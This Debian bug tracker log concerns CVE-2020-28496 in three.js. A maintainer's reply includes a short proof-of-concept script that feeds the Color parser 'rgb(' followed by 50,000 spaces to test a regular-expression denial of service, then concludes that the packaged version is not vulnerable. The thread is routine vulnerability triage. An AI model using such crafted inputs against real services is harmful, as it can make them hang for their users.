Debian Bug report logs -
#988726
CVE-2020-28496
Reply or subscribe to this bug.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, team@security.debian.org, Debian Javascript Maintainers <pkg-javascript-devel@lists.alioth.debian.org>
:
Bug#988726
; Package src:three.js
.
(Tue, 18 May 2021 18:33:04 GMT) (full text, mbox, link).
Acknowledgement sent
to Moritz Muehlenhoff <jmm@debian.org>
:
New Bug report received and forwarded. Copy sent to team@security.debian.org, Debian Javascript Maintainers <pkg-javascript-devel@lists.alioth.debian.org>
.
(Tue, 18 May 2021 18:33:04 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Source: three.js
Severity: important
Tags: security
X-Debbugs-Cc: Debian Security Team <team@security.debian.org>
This was assigned CVE-2020-28496:
https://github.com/mrdoob/three.js/issues/21132
https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e
Cheers,
Moritz
Information forwarded
to debian-bugs-dist@lists.debian.org, Debian Javascript Maintainers <pkg-javascript-devel@lists.alioth.debian.org>
:
Bug#988726
; Package src:three.js
.
(Tue, 18 May 2021 19:09:05 GMT) (full text, mbox, link).
Acknowledgement sent
to Yadd <yadd@debian.org>
:
Extra info received and forwarded to list. Copy sent to Debian Javascript Maintainers <pkg-javascript-devel@lists.alioth.debian.org>
.
(Tue, 18 May 2021 19:09:05 GMT) (full text, mbox, link).
Message #10 received at 988726@bugs.debian.org (full text, mbox, reply):
Le 18/05/2021 à 20:28, Moritz Muehlenhoff a écrit :
> Source: three.js
> Severity: important
> Tags: security
> X-Debbugs-Cc: Debian Security Team <team@security.debian.org>
>
> This was assigned CVE-2020-28496:
> https://github.com/mrdoob/three.js/issues/21132
> https://github.com/mrdoob/three.js/pull/21143/commits/4a582355216b620176a291ff319d740e619d583e
>
> Cheers,
> Moritz
Hi,
vulnerable code seems not present in version 111.
Tested with PoC code:
var three = require('.')
function build_blank (n) {
var ret = "rgb("
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "";
}
var Color = three.Color
var time = Date.now();
new Color(build_blank(50000))
var time_cost = Date.now() - time;
console.log(time_cost+" ms")
Result is 1945 ms so three.js seems not vulnerable, at least in Buster
Cheers,
Yadd
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Wed May 19 12:44:08 2021;
Machine Name:
bembo
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.